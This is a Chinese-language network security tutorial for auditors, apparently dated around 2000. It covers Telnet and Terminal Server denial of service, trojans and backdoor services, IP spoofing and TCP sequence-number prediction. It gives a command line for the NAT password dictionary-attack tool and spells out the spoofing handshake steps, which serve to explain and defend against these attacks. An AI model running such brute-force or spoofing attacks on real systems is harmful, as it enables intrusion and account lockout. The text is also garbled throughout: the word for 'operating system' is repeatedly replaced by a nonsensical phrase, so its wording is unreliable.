　　据统计，缓冲区溢出是当前最紧迫的安全问题。要获得关于缓冲区溢出的更多信息，请访问Http://www-4.ibm.com/software/de ... verflows/index.heml
Telnet的拒绝服务攻击

　　Windows中的Telnet一直以来都是网络管理员们最喜爱的网络实用工具之一，但是一个新的漏洞表明，在Windows2000中Telnet 在守护其进程时，在已经被初始化的会话还未被复位的情况下很容易受到一种普通的拒绝服务攻击。Telnet连接后，在初始化的对话还未被复位的情况下，在一定的时间间隔之后，此时如果连接用户还没有提供登录的用户名及密码，Telnet的对话将会超时。直到用户输入一个字符之后连接才会被复位。如果恶意用户连接到Windows2000的Telnet守护进程中，并且对该连接不进行复位的话，他就可以有效地拒绝其他的任何用户连接该Telnet服务器，主要是因为此时Telnet的客户连接数的最大值是1。在此期间任何其他试图连接该Telnet服务器的用户都将会收到如下错误信息：

　　Microsoft Windows Workstation allows only 1 Telnet Client LicenseServer has closed connection

　　察看“列出当前用户”选项时并不会显示超时的会话，因为该会话还没有成功地通过认证。

　　Windows NT的TCP port 3389存在漏洞

　　Windows NT Server 4.0 终端服务器版本所作的 DoS 攻击。这个安全性弱点让远端使用者可以迅速的耗尽 Windows NT Terminal Server 上所有可用的内存，造成主机上所有登陆者断线，并且无法再度登入。

　　说明：

　　1. Windows NT Server 4.0 终端服务器版本在 TCP port 3389 监听终端连接 (terminal connection)，一旦某个 TCP 连接连上这个端口, 终端服务器会开始分配系统资源，以处理新的客户端连接，并作连接的认证工作。

　　2. 此处的漏洞在于：在认证工作完成前，系统需要拨出相当多的资源去处理新的连 接，而系统并未针对分配出去的资源作节制。因此远端的攻击者可以利用建立大 量 TCP 连接到 port 3389 的方法，造成系统存储体配置达到饱和。

　　3. 此时服务器上所有使用者连接都会处于超时状态，而无法继续连接到服务器上，远端攻击者仍能利用一个仅耗用低频宽的程式，做出持续性的攻击，让此 服务器处於最多记忆体被耗用的状态，来避免新的连接继续产生。

　　4. 在国外的测试报告中指出，长期持续不断针对此项弱点的攻击，甚至可以导致服务器持续性当机，除非重新开机，服务器将无法再允许新连接的完成。

　　解决方案：

　　1. 以下是修正程序的网址：

　　ftp://ftp.microsoft.com/bussys/w ... sa/NT40tse/hotfixes postSP4/Flood-fix/

　　[注意]：因为行数限制，上面网址请合并为一行。

　　2. 更详细资料请参考 Microsoft 网站的网址：

　　http://www.microsoft.com/security/bulletins/ms99-028.asp.

　　防范拒绝服务攻击

　　你可以通过以下方法来减小拒绝服务攻击的危害：

　　· 加强想跳楼作系统的补丁等级。

　　· 如果有雇员建立特定的程序，请特别留意代码的产生过程。

　　· 只使用稳定版本的服务和程序。

　　审计非法服务，特洛伊木马和蠕虫

　　非法服务开启一个秘密的端口，提供未经许可的服务，常见的非法服务包括：

　　· NetBus

　　· BackOrifice 和 BackOrifice 2000

　　· Girlfriend

　　· 冰河2.X

　　· 秘密的建立共享的程序

　　许多程序将不同的非法服务联合起来。例如，BackOrifice2000允许你将HTTP服务配置在任意端口。你可以通过扫描开放端口来审计这类服务，确保你了解为什么这些端口是开放的。如果你不知道这些端口的用途，用包嗅探器和其它程序来了解它的用途。

　　技术提示：不要混淆非法服务和木马。木马程序通常包含非法服务，而且，木马程序还可以包含击键记录程序，蠕虫或病毒。

　　特洛伊木马

　　特洛伊木马是在执行看似正常的程序时还同时运行了未被察觉的有破坏性的程序。木马通常能够将重要的信息传送给攻击者。攻击者可以把任意数量的程序植入木马。例如，他们在一个合法的程序中安放root kit或控制程序。还有一些通常的策略是使用程序来捕获密码和口令的hash值。类似的程序可以通过E-mail把信息发送到任何地方。

　　审计木马

　　扫描开放端口是审计木马攻击的途径之一。如果你无法说明一个开放端口用途，你也许就检测到一个问题。所以，尽量在你的系统上只安装有限的软件包，同时跟踪这些程序和服务的漏洞。许多TCP/IP程序动态地使用端口，因此，你不应将所有未知的端口都视为安全漏洞。在建立好网络基线后，你便可以确定哪些端口可能存在问题了。

　　蠕虫

　　Melissa病毒向我们展示了TCP/IP网络是如何容易遭受蠕虫攻击的。在你审计系统时，通常需要配置防火墙来排除特殊的活动。防火墙规则的设置超出了本术的范围。但是，作为审计人员，你应当对建议在防火墙上过滤那些从不信任的网络来的数据包和端口有所准备。

　　蠕虫靠特定的软件传播。例如，在2000年三月发现的Win32/Melting.worm蠕虫只能攻击运行Microsoft Outlook程序的Windows想跳楼作系统。这种蠕虫可以自行传播，瘫痪任何种类的Windows系统而且使它持续地运行不稳定。

网络安全知识（3）

结合所有攻击定制审计策略
　　攻击者有两个共同的特点。首先，他们将好几种不同的方法和策略集中到一次攻击中。其次，他们在一次攻击中利用好几种系统。综合应用攻击策略可以增强攻击的成功率。同时利用好几种系统使他们更不容易被捕获。

　　例如，在实施IP欺骗时，攻击者通常会先实施拒绝服务攻击以确保被攻击主机不会建立任何连接。大多数使用Man-in-the-middle的攻击者会先捕获SMB的密码，再使用L0phtCrack这样的程序进行暴力破解攻击。

　　渗透策略

　　你已经了解到那些网络设备和服务是通常遭受攻击的目标和黑客活动的攻击特征。现在，请参考下列的一些场景。它们将有助于你在审计过程中关注那些设备和服务。请记住，将这些攻击策略结合起来的攻击是最容易成功的。

　　物理接触

　　如果攻击者能够物理接触想跳楼作系统，他们便可以通过安装和执行程序来使验证机制无效。例如，攻击者可以重启系统，利用其它启动盘控制系统。由于一种文件系统可以被另一种所破坏，所以你可以使用启动盘获得有价值的信息，例如有管理权限的账号。

　　物理攻击的简单例子包括通过重新启动系统来破坏Windows95或98的屏幕锁定功能。更简单的物理攻击是该系统根本就没有进行屏幕锁定。

　　想跳楼作系统策略

　　近来，美国白宫的Web站点（http://www.whitehouse.gov）被一个缺乏经验的攻击者黑掉。攻击者侦查出该Web服务器（www1.whitehouse.gov）运行的想跳楼作系统是Solaris 7。虽然Solaris 7被成为艺术级的想跳楼作系统，但管理员并没有改变系统的缺省设置。虽然该站点的管理员设置了tripwire，但攻击者还是使用 phf/ufsrestore命令访问了Web服务器。

　　较弱的密码策略

　　上面白宫网站被黑的例子可能是由于该系统管理员使用FTP来升级服务器。虽然使用FTP来更新网站并没有错，但大多数FTP会话使用明文传输密码。很明显，该系统管理员并没有意识到这种安全隐患。又由于大多数系统管理员在不同的服务上使用相同的密码，这使攻击者能够获得系统的访问权。更基本的，你可以保证/etc/passwd文件的安全。

　　NetBIOS Authentication Tool（NAT）

　　当攻击者以WindowsNT为目标时，他们通常会使用NetBIOS Authentication Tool（NAT）来测试弱的口令。这个程序可以实施字典攻击。当然它也有命令行界面，这种界面的攻击痕迹很小。而且命令行界面的程序也很好安装和使用。在使用NAT时，你必须指定三个文本文件和IP地址的范围。当然，你也可以指定一个地址。NAT使用两个文本文件来实施攻击而第三个来存储攻击结果。第一个文本文件包含一个用户列表，第二个文件中是你输入的猜测密码。

　　当使用命令行版本时，语法格式为：

　　 nat –u username.txt –p passwordlist.txt –o outputfile.txt

　　即使服务器设置了密码的过期策略和锁定，攻击者还是可以利用NAT反复尝试登录来骚扰管理员。通过简单地锁定所有已知的账号，攻击者会极大地影响服务器的访问，这也是一些系统管理员不强行锁定账号的原因。

　　较弱的系统策略

　　到此为止，你已经学习了一些外部攻击。然而，对于管理员来说最紧迫的是大多数公司都存在不好的安全策略。如果安全策略很弱或干脆没有安全策略，通常会导致弱的密码和系统策略。通常，公司并不采取简单的预防措施，比如需要非空的或有最小长度要求的密码。忽略这些限制会给攻击者留下很大的活动空间。

　　审计文件系统漏洞

　　不论你的想跳楼作系统采取何种文件系统（FAT，NTFS或NFS），每种系统都有它的缺陷。例如，缺省情况下NTFS在文件夹和共享创建之初 everyone组可完全控制。由于它是想跳楼作系统的组成部分（Windows NT），因此也成为许多攻击的目标。NFS文件系统可以共享被远程系统挂接，因此这也是攻击者入侵系统的途径之一。

　　IP欺骗和劫持：实例

　　IP欺骗是使验证无效的攻击手段之一，也是如何组合攻击策略攻击网络的典型实例。IP欺骗利用了Internet开放式的网络设计和传统的建立在 UNIX想跳楼作系统之间信任关系。主要的问题是使用TCP/IP协议的主机假设所有从合法IP地址发来的数据包都是有效的。攻击者可以利用这一缺陷，通过程序来发送虚假的IP包，从而建立TCP连接，攻击者可以使一个系统看起来象另一个系统。

　　许多UNIX想跳楼作系统通过rhosts和rlogin在非信任的网络上（如Internet）建立信任的连接。这种传统的技术是流行的管理工具并减轻了管理负担。通常，这种系统由于把UNIX的验证机制和IP地址使用相结合从而提供了适当的安全。然而，这种验证机制是如此的独立于IP地址不会被伪造的假设，以至于很容易被击破。

　　Non-blind spoofing 和Blind spoofing

　　Non-blind spoofing是指攻击者在同一物理网段上想跳楼纵连接。Blind spoofing是指攻击者在不同的物理网段想跳楼纵连接。后者在实施上更困难，但也时常发生。

　　进行IP欺骗的攻击者需要一些程序，包括：

　　· 一个包嗅探器

　　· 一个能够同时终止TCP连接、产生另一个TCP连接、进行IP 伪装的程序

　　IP欺骗涉及了三台主机。像先前分析的那样，使用验证的服务器必须信任和它建立连接的主机。如果缺乏天生的安全特性，欺骗是非常容易的。

　　思考下列的场景，有三台主机分别是A,B和C。A使用TCP SYN连接与合法用户B初始一个连接。但是B并没有真正参与到这次连接中，因为C已经对B实施了拒绝服务攻击。所以，虽然A认为是在与B对话，但实际上是与C对话。IP欺骗实际上组合了几种攻击手法包括对系统实施了拒绝服务攻击，还包括利用验证技术。

　　作为审计人员，你不应该说服管理员终止这种信任关系，相反，你应当建议使用防火墙规则来检测有问题的包。
TCP/IP序列号生成方法

　　TCP的Initial Sequence Number(ISN)的预测



　　正常的TCP连接基于一个三次握手(3-way handshake)，一个客户端(Client)向服务器(Server)发送一个初始化序列号ISNc，随后，服务器相应这个客户端ACK(ISNc),并且发送自己的初始化序列号ISNs，接着，客户端响应这个ISNs（如下图），三次握手完成。

　　 C ---〉S: (ISNc)

　　 S ---〉C: ACK(ISNc)+ ISNs

　　 C ---〉S: ACK(ISNs)

　　 C ---〉S: data

　　 and / or

　　 S ---〉C: data

　　下面，我以Windows2000 Advanced Server为例，来说一下两台主机是如何进行三次握手。

　　我们可以看到：

　　1) Smartboy首先发送一个seq:32468329的包给服务器202.116.128.6。

　　2) 然后, 202.116.128.6响应主机Smartboy, 它送给Smartboy自己的

　　 seq:3333416325 而且响应Smartboy的ack:3240689240。

　　3) Smartboy再响应服务器202.116.128.6, seq:3240689240, ack:3333416326。

　　 三次握手完毕，两台几建立起连接。

　　 可以看出，在三次握手协议中，Clinet一定要监听服务器发送过来的ISNs, TCP使用的sequence number是一个32位的计数器，从0-4294967295。TCP为每一个连接选择一个初始序号ISN，为了防止因为延迟、重传等扰乱三次握手， ISN不能随便选取，不同系统有不同算法。理解TCP如何分配ISN以及ISN随时间变化的规律，对于成功地进行IP欺骗攻击很重要。

　　在Unix系统里，基于远程过程调用RPC的命令，比如rlogin、rcp、rsh等等，根据/etc/hosts.equiv以及$ HOME/.rhosts文件进行安全校验，其实质是仅仅根据源IP地址进行用户身份确认，以便允许或拒绝用户RPC。这就给与了那些攻击者进行IP地址欺骗的机会。

　　 让我们看X是如何冒充T来欺骗S，从而建立一个非法连接 ：

　　 X---->S: SYN(ISNx ) , SRC = T

　　 S---->T: SYN(ISNs ) , ACK(ISNT) （*）

　　 X---->S: ACK(ISNs+1 ) , SRC = T （**）

　　 X---->S: ACK(ISNs +1) , SRC = T, 攻击命令（可能是一些特权命令）

　　 但是，T必须要在第（**）中给出ISNs, 问题是ISNs在第（*）步中发给了T(X当然很难截取到)，幸运的是，TCP协议有一个约定: ISN变量每秒增加250,000次，这个增加值在许多版本比较旧的想跳楼作系统中都是一个常量，在FreeBSD4.3中是125000次每秒，这就给 X一个可乘之机。